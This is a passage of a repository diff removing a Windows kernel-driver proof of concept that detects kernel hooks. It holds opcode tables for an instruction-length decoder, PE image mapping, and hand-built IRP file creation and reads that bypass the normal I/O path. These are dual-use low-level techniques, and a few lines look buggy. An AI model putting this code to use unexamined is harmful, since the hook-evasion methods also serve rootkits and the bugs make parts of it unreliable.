OP_WORD, // DC
OP_WORD, // DD
OP_WORD, // DE
OP_WORD, // DF
OP_DATA_I8, // E0
OP_DATA_I8, // E1
OP_DATA_I8, // E2
OP_DATA_I8, // E3
OP_DATA_I8, // E4
OP_DATA_I8, // E5
OP_DATA_I8, // E6
OP_DATA_I8, // E7
OP_DATA_PRE66_67 | OP_REL32, // E8
OP_DATA_PRE66_67 | OP_REL32, // E9
OP_DATA_I16 | OP_DATA_PRE66_67,// EA
OP_DATA_I8, // EB
OP_NONE, // EC
OP_NONE, // ED
OP_NONE, // EE
OP_NONE, // EF
OP_NONE, // F0
OP_NONE, // F1
OP_NONE, // F2
OP_NONE, // F3
OP_NONE, // F4
OP_NONE, // F5
OP_MODRM, // F6
OP_MODRM, // F7
OP_NONE, // F8
OP_NONE, // F9
OP_NONE, // FA
OP_NONE, // FB
OP_NONE, // FC
OP_NONE, // FD
OP_MODRM, // FE
OP_MODRM | OP_REL32 // FF
};
UCHAR OpcodeFlagsExt[256] =
{
OP_MODRM, // 00
OP_MODRM, // 01
OP_MODRM, // 02
OP_MODRM, // 03
OP_NONE, // 04
OP_NONE, // 05
OP_NONE, // 06
OP_NONE, // 07
OP_NONE, // 08
OP_NONE, // 09
OP_NONE, // 0A
OP_NONE, // 0B
OP_NONE, // 0C
OP_MODRM, // 0D
OP_NONE, // 0E
OP_MODRM | OP_DATA_I8, // 0F
OP_MODRM, // 10
OP_MODRM, // 11
OP_MODRM, // 12
OP_MODRM, // 13
OP_MODRM, // 14
OP_MODRM, // 15
OP_MODRM, // 16
OP_MODRM, // 17
OP_MODRM, // 18
OP_NONE, // 19
OP_NONE, // 1A
OP_NONE, // 1B
OP_NONE, // 1C
OP_NONE, // 1D
OP_NONE, // 1E
OP_NONE, // 1F
OP_MODRM, // 20
OP_MODRM, // 21
OP_MODRM, // 22
OP_MODRM, // 23
OP_MODRM, // 24
OP_NONE, // 25
OP_MODRM, // 26
OP_NONE, // 27
OP_MODRM, // 28
OP_MODRM, // 29
OP_MODRM, // 2A
OP_MODRM, // 2B
OP_MODRM, // 2C
OP_MODRM, // 2D
OP_MODRM, // 2E
OP_MODRM, // 2F
OP_NONE, // 30
OP_NONE, // 31
OP_NONE, // 32
OP_NONE, // 33
OP_NONE, // 34
OP_NONE, // 35
OP_NONE, // 36
OP_NONE, // 37
OP_NONE, // 38
OP_NONE, // 39
OP_NONE, // 3A
OP_NONE, // 3B
OP_NONE, // 3C
OP_NONE, // 3D
OP_NONE, // 3E
OP_NONE, // 3F
OP_MODRM, // 40
OP_MODRM, // 41
OP_MODRM, // 42
OP_MODRM, // 43
OP_MODRM, // 44
OP_MODRM, // 45
OP_MODRM, // 46
OP_MODRM, // 47
OP_MODRM, // 48
OP_MODRM, // 49
OP_MODRM, // 4A
OP_MODRM, // 4B
OP_MODRM, // 4C
OP_MODRM, // 4D
OP_MODRM, // 4E
OP_MODRM, // 4F
OP_MODRM, // 50
OP_MODRM, // 51
OP_MODRM, // 52
OP_MODRM, // 53
OP_MODRM, // 54
OP_MODRM, // 55
OP_MODRM, // 56
OP_MODRM, // 57
OP_MODRM, // 58
OP_MODRM, // 59
OP_MODRM, // 5A
OP_MODRM, // 5B
OP_MODRM, // 5C
OP_MODRM, // 5D
OP_MODRM, // 5E
OP_MODRM, // 5F
OP_MODRM, // 60
OP_MODRM, // 61
OP_MODRM, // 62
OP_MODRM, // 63
OP_MODRM, // 64
OP_MODRM, // 65
OP_MODRM, // 66
OP_MODRM, // 67
OP_MODRM, // 68
OP_MODRM, // 69
OP_MODRM, // 6A
OP_MODRM, // 6B
OP_MODRM, // 6C
OP_MODRM, // 6D
OP_MODRM, // 6E
OP_MODRM, // 6F
OP_MODRM | OP_DATA_I8, // 70
OP_MODRM | OP_DATA_I8, // 71
OP_MODRM | OP_DATA_I8, // 72
OP_MODRM | OP_DATA_I8, // 73
OP_MODRM, // 74
OP_MODRM, // 75
OP_MODRM, // 76
OP_NONE, // 77
OP_NONE, // 78
OP_NONE, // 79
OP_NONE, // 7A
OP_NONE, // 7B
OP_MODRM, // 7C
OP_MODRM, // 7D
OP_MODRM, // 7E
OP_MODRM, // 7F
OP_DATA_PRE66_67 | OP_REL32, // 80
OP_DATA_PRE66_67 | OP_REL32, // 81
OP_DATA_PRE66_67 | OP_REL32, // 82
OP_DATA_PRE66_67 | OP_REL32, // 83
OP_DATA_PRE66_67 | OP_REL32, // 84
OP_DATA_PRE66_67 | OP_REL32, // 85
OP_DATA_PRE66_67 | OP_REL32, // 86
OP_DATA_PRE66_67 | OP_REL32, // 87
OP_DATA_PRE66_67 | OP_REL32, // 88
OP_DATA_PRE66_67 | OP_REL32, // 89
OP_DATA_PRE66_67 | OP_REL32, // 8A
OP_DATA_PRE66_67 | OP_REL32, // 8B
OP_DATA_PRE66_67 | OP_REL32, // 8C
OP_DATA_PRE66_67 | OP_REL32, // 8D
OP_DATA_PRE66_67 | OP_REL32, // 8E
OP_DATA_PRE66_67 | OP_REL32, // 8F
OP_MODRM, // 90
OP_MODRM, // 91
OP_MODRM, // 92
OP_MODRM, // 93
OP_MODRM, // 94
OP_MODRM, // 95
OP_MODRM, // 96
OP_MODRM, // 97
OP_MODRM, // 98
OP_MODRM, // 99
OP_MODRM, // 9A
OP_MODRM, // 9B
OP_MODRM, // 9C
OP_MODRM, // 9D
OP_MODRM, // 9E
OP_MODRM, // 9F
OP_NONE, // A0
OP_NONE, // A1
OP_NONE, // A2
OP_MODRM, // A3
OP_MODRM | OP_DATA_I8, // A4
OP_MODRM, // A5
OP_NONE, // A6
OP_NONE, // A7
OP_NONE, // A8
OP_NONE, // A9
OP_NONE, // AA
OP_MODRM, // AB
OP_MODRM | OP_DATA_I8, // AC
OP_MODRM, // AD
OP_MODRM, // AE
OP_MODRM, // AF
OP_MODRM, // B0
OP_MODRM, // B1
OP_MODRM, // B2
OP_MODRM, // B3
OP_MODRM, // B4
OP_MODRM, // B5
OP_MODRM, // B6
OP_MODRM, // B7
OP_NONE, // B8
OP_NONE, // B9
OP_MODRM | OP_DATA_I8, // BA
OP_MODRM, // BB
OP_MODRM, // BC
OP_MODRM, // BD
OP_MODRM, // BE
OP_MODRM, // BF
OP_MODRM, // C0
OP_MODRM, // C1
OP_MODRM | OP_DATA_I8, // C2
OP_MODRM, // C3
OP_MODRM | OP_DATA_I8, // C4
OP_MODRM | OP_DATA_I8, // C5
OP_MODRM | OP_DATA_I8, // C6
OP_MODRM, // C7
OP_NONE, // C8
OP_NONE, // C9
OP_NONE, // CA
OP_NONE, // CB
OP_NONE, // CC
OP_NONE, // CD
OP_NONE, // CE
OP_NONE, // CF
OP_MODRM, // D0
OP_MODRM, // D1
OP_MODRM, // D2
OP_MODRM, // D3
OP_MODRM, // D4
OP_MODRM, // D5
OP_MODRM, // D6
OP_MODRM, // D7
OP_MODRM, // D8
OP_MODRM, // D9
OP_MODRM, // DA
OP_MODRM, // DB
OP_MODRM, // DC
OP_MODRM, // DD
OP_MODRM, // DE
OP_MODRM, // DF
OP_MODRM, // E0
OP_MODRM, // E1
OP_MODRM, // E2
OP_MODRM, // E3
OP_MODRM, // E4
OP_MODRM, // E5
OP_MODRM, // E6
OP_MODRM, // E7
OP_MODRM, // E8
OP_MODRM, // E9
OP_MODRM, // EA
OP_MODRM, // EB
OP_MODRM, // EC
OP_MODRM, // ED
OP_MODRM, // EE
OP_MODRM, // EF
OP_MODRM, // F0
OP_MODRM, // F1
OP_MODRM, // F2
OP_MODRM, // F3
OP_MODRM, // F4
OP_MODRM, // F5
OP_MODRM, // F6
OP_MODRM, // F7
OP_MODRM, // F8
OP_MODRM, // F9
OP_MODRM, // FA
OP_MODRM, // FB
OP_MODRM, // FC
OP_MODRM, // FD
OP_MODRM, // FE
OP_NONE // FF
};
NTSTATUS
MapFileInUserSpace(WCHAR* wzFilePath,IN HANDLE hProcess OPTIONAL,
OUT PVOID *BaseAddress,
OUT PSIZE_T ViewSize OPTIONAL)
{
NTSTATUS Status = STATUS_INVALID_PARAMETER;
HANDLE hFile = NULL;
HANDLE hSection = NULL;
OBJECT_ATTRIBUTES oa;
SIZE_T MapViewSize = 0;
IO_STATUS_BLOCK Iosb;
UNICODE_STRING uniFilePath;
if (!wzFilePath || !BaseAddress){
return Status;
}
RtlInitUnicodeString(&uniFilePath, wzFilePath);
InitializeObjectAttributes(&oa,
&uniFilePath,
OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
NULL,
NULL
);
Status = IoCreateFile(&hFile,
GENERIC_READ | SYNCHRONIZE,
&oa,
&Iosb,
NULL,
FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ,
FILE_OPEN,
FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0,
CreateFileTypeNone,
NULL,
IO_NO_PARAMETER_CHECKING
);
if (!NT_SUCCESS(Status))
{
return Status;
}
oa.ObjectName = NULL;
Status = ZwCreateSection(&hSection,
SECTION_QUERY | SECTION_MAP_READ,
&oa,
NULL,
PAGE_WRITECOPY,
SEC_IMAGE,
hFile
);
ZwClose(hFile);
if (!NT_SUCCESS(Status))
{
return Status;
}
if (!hProcess){
hProcess = NtCurrentProcess();
}
Status = ZwMapViewOfSection(hSection,
hProcess,
BaseAddress,
0,
0,
0,
ViewSize ? ViewSize : &MapViewSize,
ViewUnmap,
0,
PAGE_WRITECOPY
);
ZwClose(hSection);
if (!NT_SUCCESS(Status))
{
return Status;
}
return Status;
}
//通过指令获得函数大小
unsigned long __fastcall GetFunctionCodeSize(void *Proc)
{
ULONG Length;
PUCHAR pOpcode;
ULONG Result = 0;
ULONG CCINT3Count=0;
do
{
Length = SizeOfCode(Proc, &pOpcode);
Result += Length;
if ((Length == 1) && (*pOpcode == 0xCC||*pOpcode==0x90)) CCINT3Count++;
if (CCINT3Count>1 ||
*pOpcode == 0x00)
{
break; //判断退出指令
}
Proc = (PVOID)((ULONG)Proc + Length);
} while (Length);
return Result;
}
unsigned long __fastcall SizeOfCode(void *Code, unsigned char **pOpcode)
{
PUCHAR cPtr;
UCHAR Flags;
BOOLEAN PFX66, PFX67;
BOOLEAN SibPresent;
UCHAR iMod, iRM, iReg;
UCHAR OffsetSize, Add;
UCHAR Opcode;
OffsetSize = 0;
PFX66 = FALSE;
PFX67 = FALSE;
cPtr = (PUCHAR)Code;
while ((*cPtr == 0x2E) || (*cPtr == 0x3E) || (*cPtr == 0x36) ||
(*cPtr == 0x26) || (*cPtr == 0x64) || (*cPtr == 0x65) ||
(*cPtr == 0xF0) || (*cPtr == 0xF2) || (*cPtr == 0xF3) ||
(*cPtr == 0x66) || (*cPtr == 0x67))
{
if (*cPtr == 0x66) PFX66 = TRUE;
if (*cPtr == 0x67) PFX67 = TRUE;
cPtr++;
if (cPtr > (PUCHAR)Code + 16) return 0;
}
Opcode = *cPtr;
if (pOpcode) *pOpcode = cPtr;
if (*cPtr == 0x0F)
{
cPtr++;
Flags = OpcodeFlagsExt[*cPtr];
} else
{
Flags = OpcodeFlags[Opcode];
if (Opcode >= 0xA0 && Opcode <= 0xA3) PFX66 = PFX67;
}
cPtr++;
if (Flags & OP_WORD) cPtr++;
if (Flags & OP_MODRM)
{
iMod = *cPtr >> 6;
iReg = (*cPtr & 0x38) >> 3;
iRM = *cPtr & 7;
cPtr++;
if ((Opcode == 0xF6) && !iReg) Flags |= OP_DATA_I8;
if ((Opcode == 0xF7) && !iReg) Flags |= OP_DATA_PRE66_67;
SibPresent = !PFX67 & (iRM == 4);
switch (iMod)
{
case 0:
if ( PFX67 && (iRM == 6)) OffsetSize = 2;
if (!PFX67 && (iRM == 5)) OffsetSize = 4;
break;
case 1: OffsetSize = 1;
break;
case 2: if (PFX67) OffsetSize = 2; else OffsetSize = 4;
break;
case 3: SibPresent = FALSE;
}
if (SibPresent)
{
if (((*cPtr & 7) == 5) && ( (!iMod) || (iMod == 2) )) OffsetSize = 4;
cPtr++;
}
cPtr = (PUCHAR)(ULONG)cPtr + OffsetSize;
}
if (Flags & OP_DATA_I8) cPtr ++;
if (Flags & OP_DATA_I16) cPtr += 2;
if (Flags & OP_DATA_I32) cPtr += 4;
if (PFX66) Add = 2;
else Add = 4;
if (Flags & OP_DATA_PRE66_67) cPtr += Add;
return (ULONG)cPtr - (ULONG)Code;
}
BOOL IsAddressInSystem(ULONG ulDriverBase,ULONG *ulSysModuleBase,ULONG *ulSize,char *lpszSysModuleImage)
{
NTSTATUS status;
ULONG NeededSize,i;
PMODULES pModuleList;
BOOL bRet = FALSE;
BOOL bInit = FALSE;
if (ZwQuerySystemInformation &&
ExAllocatePool &&
ExFreePool)
{
bInit = TRUE;
}
if (!bInit)
return FALSE;
__try
{
status=ZwQuerySystemInformation(
SystemModuleInformation,
NULL,
0,
&NeededSize);
if (status!=STATUS_INFO_LENGTH_MISMATCH)
{
//KdPrint(("ZwQuerySystemInformation failed:%d",RtlNtStatusToDosError(status)));
return bRet;
}
pModuleList=(PMODULES)ExAllocatePool(NonPagedPool,NeededSize);
if (pModuleList)
{
status=ZwQuerySystemInformation(
SystemModuleInformation,
pModuleList,
NeededSize,
&NeededSize);
if (NT_SUCCESS(status))
{
for (i=0;i<pModuleList->ulCount;i++)
{
if (ulDriverBase > pModuleList->smi[i].Base && ulDriverBase < pModuleList->smi[i].Base + pModuleList->smi[i].Size)
{
bRet = TRUE;
__try
{
*ulSysModuleBase = pModuleList->smi[i].Base;
*ulSize = pModuleList->smi[i].Size;
memset(lpszSysModuleImage,0,sizeof(lpszSysModuleImage));
strcat(lpszSysModuleImage,pModuleList->smi[i].ImageName);
}__except(EXCEPTION_EXECUTE_HANDLER){
}
break;
}
}
}
//else
// KdPrint(("@@ZwQuerySystemInformation failed:%d",RtlNtStatusToDosError(status)));
ExFreePool(pModuleList);
pModuleList = NULL;
}
//else
// KdPrint(("ExAllocatePool failed"));
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
}
if (pModuleList)
ExFreePool(pModuleList);
return bRet;
}

31
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/Common.h
View File

@ -1,31 +0,0 @@
#include "DriverEntry.h"
#include <ntimage.h>
typedef unsigned long DWORD;
typedef void *HANDLE;
typedef unsigned char BOOL, *PBOOL;
#define SEC_IMAGE 0x01000000
NTSYSAPI
PIMAGE_NT_HEADERS
NTAPI
RtlImageNtHeader(PVOID Base);
NTSTATUS
MapFileInUserSpace(WCHAR* wzFilePath,IN HANDLE hProcess OPTIONAL,
OUT PVOID *BaseAddress,
OUT PSIZE_T ViewSize OPTIONAL);
LONG GetSSDTApiFunctionIndexFromNtdll(char* szFindFunctionName);
BOOL IsAddressInSystem(ULONG ulDriverBase,ULONG *ulSysModuleBase,ULONG *ulSize,char *lpszSysModuleImage);
#define OP_NONE 0x00
#define OP_MODRM 0x01
#define OP_DATA_I8 0x02
#define OP_DATA_I16 0x04
#define OP_DATA_I32 0x08
#define OP_DATA_PRE66_67 0x10
#define OP_WORD 0x20
#define OP_REL32 0x40
unsigned long __fastcall GetFunctionCodeSize(void *Proc);
unsigned long __fastcall SizeOfCode(void *Code, unsigned char **pOpcode);

136
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/DriverEntry.c
View File

@ -1,136 +0,0 @@
#include "DriverEntry.h"
#include "KernelHookCheck.h"
#include "Reload.h"
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegisterPath)
{
ULONG ImageBase = 0;
NTSTATUS Status = STATUS_SUCCESS;
UNICODE_STRING uniDeviceName;
UNICODE_STRING uniLinkName;
PDEVICE_OBJECT DeviceObject = NULL;
ULONG_PTR i = 0;
RtlInitUnicodeString(&uniDeviceName,DEVICE_NAME);
RtlInitUnicodeString(&uniLinkName,LINK_NAME);
for (i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i++)
{
DriverObject->MajorFunction[i] = DefaultPassThrough;
}
DriverObject->DriverUnload = UnloadDriver;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ControlPassThrough;
//´´½¨É豸¶ÔÏó
Status = IoCreateDevice(DriverObject,0,&uniDeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,&DeviceObject);
if (!NT_SUCCESS(Status))
{
return Status;
}
Status = IoCreateSymbolicLink(&uniLinkName,&uniDeviceName);
if (!NT_SUCCESS(Status))
{
IoDeleteDevice(DeviceObject);
return Status;
}
//PINLINEHOOKINFO InlineHookInfo ;
//InlineHookInfo = ExAllocatePool(1,sizeof(INLINEHOOKINFO)+0x1000*sizeof(INLINEHOOKINFO_INFORMATION));
//memset(InlineHookInfo,0,sizeof(INLINEHOOKINFO)+0x1000*sizeof(INLINEHOOKINFO_INFORMATION));
//DriverObject->DriverUnload = UnloadDriver;
ReLoadNtos(DriverObject,ImageBase);
//KernelHookCheck(InlineHookInfo);
return STATUS_SUCCESS;
}
NTSTATUS
ControlPassThrough(PDEVICE_OBJECT DeviceObject,PIRP Irp)
{
NTSTATUS Status = STATUS_SUCCESS;
PIO_STACK_LOCATION IrpSp;
PVOID InputBuffer = NULL;
PVOID OutputBuffer = NULL;
ULONG_PTR InputSize = 0;
ULONG_PTR OutputSize = 0;
ULONG_PTR IoControlCode = 0;
IrpSp = IoGetCurrentIrpStackLocation(Irp);
InputBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;
OutputBuffer = Irp->UserBuffer;
InputSize = IrpSp->Parameters.DeviceIoControl.InputBufferLength;
OutputSize = IrpSp->Parameters.DeviceIoControl.OutputBufferLength;
IoControlCode = IrpSp->Parameters.DeviceIoControl.IoControlCode;
switch(IoControlCode)
{
case CTL_CHECKKERNELMODULE:
{
if (!MmIsAddressValid(OutputBuffer))
{
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
Irp->IoStatus.Information = 0;
break;
}
__try
{
ProbeForWrite(OutputBuffer,OutputSize,sizeof(PVOID));
Status = KernelHookCheck((PINLINEHOOKINFO)OutputBuffer);
Irp->IoStatus.Information = 0;
Status = Irp->IoStatus.Status = Status;
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
Irp->IoStatus.Information = 0;
Status = Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
}
Irp->IoStatus.Information = 0;
Status = Irp->IoStatus.Status = Status;
break;
}
default:
{
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
Irp->IoStatus.Information = 0;
break;
}
}
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return Status;
}
NTSTATUS
DefaultPassThrough(PDEVICE_OBJECT DeviceObject,PIRP Irp)
{
Irp->IoStatus.Information = 0;
Irp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
VOID UnloadDriver(PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING uniLinkName;
PDEVICE_OBJECT CurrentDeviceObject;
PDEVICE_OBJECT NextDeviceObject;
RtlInitUnicodeString(&uniLinkName,LINK_NAME);
IoDeleteSymbolicLink(&uniLinkName);
if (DriverObject->DeviceObject!=NULL)
{
CurrentDeviceObject = DriverObject->DeviceObject;
while(CurrentDeviceObject!=NULL)
{
NextDeviceObject = CurrentDeviceObject->NextDevice;
IoDeleteDevice(CurrentDeviceObject);
CurrentDeviceObject = NextDeviceObject;
}
}
DbgPrint("UnloadDriver\r\n");
}

35
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/DriverEntry.h
View File

@ -1,35 +0,0 @@
#include <ntifs.h>
#include <devioctl.h>
#pragma once
#define DEVICE_NAME L"\\Device\\CheckKernelHookDeviceName"
#define LINK_NAME L"\\DosDevices\\CheckKernelHookLinkName"
#define CTL_CHECKKERNELMODULE \
CTL_CODE(FILE_DEVICE_UNKNOWN,0x830,METHOD_NEITHER,FILE_ANY_ACCESS)
NTSTATUS
DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegisterPath);
VOID UnloadDriver(PDRIVER_OBJECT DriverObject);
NTSTATUS
DefaultPassThrough(PDEVICE_OBJECT DeviceObject,PIRP Irp);
NTSTATUS
ControlPassThrough(PDEVICE_OBJECT DeviceObject,PIRP Irp);
typedef struct _INLINEHOOKINFO_INFORMATION { //INLINEHOOKINFO_INFORMATION
ULONG ulHookType;
ULONG ulMemoryFunctionBase; //ԭʼµØÖ·
ULONG ulMemoryHookBase; //HOOK µØÖ·
CHAR lpszFunction[256];
CHAR lpszHookModuleImage[256];
ULONG ulHookModuleBase;
ULONG ulHookModuleSize;
} INLINEHOOKINFO_INFORMATION, *PINLINEHOOKINFO_INFORMATION;
typedef struct _INLINEHOOKINFO { //InlineHook
ULONG ulCount;
INLINEHOOKINFO_INFORMATION InlineHook[1];
} INLINEHOOKINFO, *PINLINEHOOKINFO;

306
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/FileSystem.c
View File

@ -1,306 +0,0 @@
#include "FileSystem.h"
/*创建文件对象相当于自己实现了IoCreateFile FileObject中的IrpList循环指向自身*/
NTSTATUS
IrpCreateFile(
IN PUNICODE_STRING FilePath,
IN ACCESS_MASK DesiredAccess,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PDEVICE_OBJECT DeviceObject,
IN PDEVICE_OBJECT RealDevice,
OUT PFILE_OBJECT *FileObject
)
{
NTSTATUS ntStatus;
HANDLE hFile;
PFILE_OBJECT _FileObject;
UNICODE_STRING UniDeviceNameString;
OBJECT_ATTRIBUTES ObjectAttributes;
IO_STATUS_BLOCK IoStatusBlock;
WCHAR *FileNameBuffer=NULL;
WORD FileObjectSize;
PIRP Irp;
KEVENT kEvent;
PIO_STACK_LOCATION IrpSp;
ACCESS_STATE AccessState;
AUX_ACCESS_DATA AuxData;
IO_SECURITY_CONTEXT SecurityContext;
PLIST_ENTRY IrpList;
InitializeObjectAttributes(&ObjectAttributes, NULL, OBJ_CASE_INSENSITIVE, 0, NULL);
//in win7 x86
FileObjectSize=0x80;
//创建文件对象
ntStatus = ObCreateObject(KernelMode,
*IoFileObjectType,
&ObjectAttributes,
KernelMode,
NULL,
FileObjectSize,
0,
0,
&_FileObject);
if(!NT_SUCCESS(ntStatus))
{
return ntStatus;
}
Irp = IoAllocateIrp(DeviceObject->StackSize, FALSE); //在Irp堆栈上申请内存空间 大小为之前查询的DeviceObject->Size
if(Irp == NULL)
{
ObDereferenceObject(_FileObject);
return STATUS_INSUFFICIENT_RESOURCES;
}
KeInitializeEvent(&kEvent, SynchronizationEvent, FALSE);
RtlZeroMemory(_FileObject, FileObjectSize);
_FileObject->Type = IO_TYPE_FILE; //文件对象类型
_FileObject->Size = FileObjectSize; //文件对象大小
_FileObject->DeviceObject = RealDevice; //查询到的卷设备
_FileObject->Flags = FO_SYNCHRONOUS_IO;
FileNameBuffer=ExAllocatePool(NonPagedPool,FilePath->MaximumLength);
if (FileNameBuffer==NULL)
{
ObDereferenceObject(_FileObject);
return STATUS_INSUFFICIENT_RESOURCES;
}
RtlCopyMemory(FileNameBuffer,FilePath->Buffer,FilePath->Length);//文件对象中的文件路径
_FileObject->FileName.Buffer=FileNameBuffer; //
_FileObject->FileName.Length=FilePath->Length;
_FileObject->FileName.MaximumLength=FilePath->MaximumLength;
IrpList=(PLIST_ENTRY)((DWORD)FileObject+0x74); //IrpList 循环指向自身
IrpList->Flink=IrpList;
IrpList->Blink=IrpList;
KeInitializeEvent(&_FileObject->Lock, SynchronizationEvent, FALSE);
KeInitializeEvent(&_FileObject->Event, NotificationEvent, FALSE);
RtlZeroMemory(&AuxData, sizeof(AUX_ACCESS_DATA));
ntStatus = SeCreateAccessState( &AccessState, //访问权限
&AuxData,
DesiredAccess,
IoGetFileObjectGenericMapping());
if (!NT_SUCCESS(ntStatus))
{
IoFreeIrp(Irp);
ObDereferenceObject(_FileObject);
ExFreePool(FileNameBuffer);
return ntStatus;
}
SecurityContext.SecurityQos = NULL;
SecurityContext.AccessState = &AccessState;
SecurityContext.DesiredAccess = DesiredAccess;
SecurityContext.FullCreateOptions = 0;
Irp->MdlAddress = NULL;
Irp->AssociatedIrp.SystemBuffer = NULL;
Irp->Flags = IRP_CREATE_OPERATION|IRP_SYNCHRONOUS_API;
Irp->RequestorMode = KernelMode;
Irp->UserIosb = &IoStatusBlock;
Irp->UserEvent = &kEvent;
Irp->PendingReturned = FALSE;
Irp->Cancel = FALSE;
Irp->CancelRoutine = NULL;
Irp->Tail.Overlay.Thread = PsGetCurrentThread();
Irp->Tail.Overlay.AuxiliaryBuffer = NULL;
Irp->Tail.Overlay.OriginalFileObject = _FileObject;
IrpSp = IoGetNextIrpStackLocation(Irp);
IrpSp->MajorFunction = IRP_MJ_CREATE;
IrpSp->DeviceObject = DeviceObject;
IrpSp->FileObject = _FileObject;
IrpSp->Parameters.Create.SecurityContext = &SecurityContext;
IrpSp->Parameters.Create.Options = (CreateDisposition << 24) | CreateOptions;
IrpSp->Parameters.Create.FileAttributes = (USHORT)FileAttributes;
IrpSp->Parameters.Create.ShareAccess = (USHORT)ShareAccess;
IrpSp->Parameters.Create.EaLength = 0;
IoSetCompletionRoutine(Irp, IoCompletionRoutine, 0, TRUE, TRUE, TRUE);
ntStatus = IoCallDriver(DeviceObject, Irp);
if(ntStatus == STATUS_PENDING)
KeWaitForSingleObject(&kEvent, Executive, KernelMode, TRUE, 0);
ntStatus = IoStatusBlock.Status;
if(!NT_SUCCESS(ntStatus))
{
_FileObject->DeviceObject = NULL;
ObDereferenceObject(_FileObject);
}
else
{//增加引用计数
InterlockedIncrement(&_FileObject->DeviceObject->ReferenceCount);
if (_FileObject->Vpb)
InterlockedIncrement(&_FileObject->Vpb->ReferenceCount);
*FileObject = _FileObject;
}
return ntStatus;
}
NTSTATUS
IoCompletionRoutine(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context)
{
*Irp->UserIosb = Irp->IoStatus;
if (Irp->UserEvent)
KeSetEvent(Irp->UserEvent, IO_NO_INCREMENT, 0);
if (Irp->MdlAddress)
{
IoFreeMdl(Irp->MdlAddress);
Irp->MdlAddress = NULL;
}
IoFreeIrp(Irp);
return STATUS_MORE_PROCESSING_REQUIRED;
}
//查询irp堆栈信息传入FileObject
NTSTATUS
IrpQueryInformationFile(
IN PFILE_OBJECT FileObject,
IN PDEVICE_OBJECT DeviceObject,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass)
{
NTSTATUS ntStatus;
PIRP Irp;
KEVENT kEvent;
PIO_STACK_LOCATION IrpSp;
IO_STATUS_BLOCK IoStatusBlock;
// if (FileObject->Vpb == 0 || FileObject->Vpb->DeviceObject == NULL)
// return STATUS_UNSUCCESSFUL;
Irp = IoAllocateIrp(DeviceObject->StackSize, FALSE);
if(Irp == NULL)
return STATUS_INSUFFICIENT_RESOURCES;
KeInitializeEvent(&kEvent, SynchronizationEvent, FALSE);
RtlZeroMemory(FileInformation, Length);
Irp->AssociatedIrp.SystemBuffer = FileInformation;
Irp->UserEvent = &kEvent;
Irp->UserIosb = &IoStatusBlock;
Irp->RequestorMode = KernelMode;
Irp->Tail.Overlay.Thread = PsGetCurrentThread();
Irp->Tail.Overlay.OriginalFileObject = FileObject;
IrpSp = IoGetNextIrpStackLocation(Irp);
IrpSp->MajorFunction = IRP_MJ_QUERY_INFORMATION;
IrpSp->DeviceObject = DeviceObject;
IrpSp->FileObject = FileObject;
IrpSp->Parameters.QueryFile.Length = Length;
IrpSp->Parameters.QueryFile.FileInformationClass = FileInformationClass;
IoSetCompletionRoutine(Irp, IoCompletionRoutine, 0, TRUE, TRUE, TRUE);
ntStatus = IoCallDriver(DeviceObject, Irp);
if (ntStatus == STATUS_PENDING)
KeWaitForSingleObject(&kEvent, Executive, KernelMode, TRUE, 0);
return IoStatusBlock.Status;
}
//Irp请求将文件读入缓冲区中
NTSTATUS
IrpReadFile(
IN PFILE_OBJECT FileObject,
IN PDEVICE_OBJECT DeviceObject,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL)
{
NTSTATUS ntStatus;
PIRP Irp;
KEVENT kEvent;
PIO_STACK_LOCATION IrpSp;
//
if(ByteOffset == NULL)
{
if(!(FileObject->Flags & FO_SYNCHRONOUS_IO))
return STATUS_INVALID_PARAMETER;
ByteOffset = &FileObject->CurrentByteOffset;
}
Irp = IoAllocateIrp(DeviceObject->StackSize, FALSE);
if(Irp == NULL) return STATUS_INSUFFICIENT_RESOURCES;
RtlZeroMemory(Buffer, Length);
if(FileObject->DeviceObject->Flags & DO_BUFFERED_IO) //缓冲方式
{
Irp->AssociatedIrp.SystemBuffer = Buffer;
}
else if(FileObject->DeviceObject->Flags & DO_DIRECT_IO) //直接方式
{
Irp->MdlAddress = IoAllocateMdl(Buffer, Length, 0, 0, 0);
if (Irp->MdlAddress == NULL)
{
IoFreeIrp(Irp);
return STATUS_INSUFFICIENT_RESOURCES;
}
MmBuildMdlForNonPagedPool(Irp->MdlAddress);
}
else //其他方式
{
Irp->UserBuffer = Buffer;
}
KeInitializeEvent(&kEvent, SynchronizationEvent, FALSE);
Irp->UserEvent = &kEvent;
Irp->UserIosb = IoStatusBlock;
Irp->RequestorMode = KernelMode;
Irp->Flags = IRP_READ_OPERATION;
Irp->Tail.Overlay.Thread = PsGetCurrentThread();
Irp->Tail.Overlay.OriginalFileObject = FileObject;
IrpSp = IoGetNextIrpStackLocation(Irp);
IrpSp->MajorFunction = IRP_MJ_READ;
IrpSp->MinorFunction = IRP_MN_NORMAL;
